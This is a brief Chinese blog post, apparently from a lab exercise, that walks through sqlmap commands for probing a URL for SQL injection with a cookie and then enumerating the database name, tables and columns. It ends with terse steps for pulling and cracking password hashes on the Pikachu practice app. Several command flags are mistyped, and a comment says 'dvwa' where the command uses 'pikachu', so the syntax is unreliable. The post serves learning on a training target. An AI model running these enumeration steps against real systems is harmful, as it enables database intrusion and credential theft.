what’s sqlmap?
自动化测试sql注入和数据库接管工具
sqlmap经典用法
第一步:
-U"XXX" --Cookie=“yyy”//带上cookie对URL进行注入探测
第二步:
-U “xxx” --cookie=“yyy”-current-db//对数据库名进行获取
第三步:
-U"xxx" --cookie=“yyy” -D pikachu–tables//对数据库的表名进行枚举
第四步:
-u “xxx” --cookie=“yyy” -D pikachu-T users–columns//对dvwa库里面的名为users表的列名进行枚
在盲注列表下复制地址
用sqlmap -u""指令进行
找到联合查询漏洞
再次输入指令
找到表
找到密文
等待时间破译
解决
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
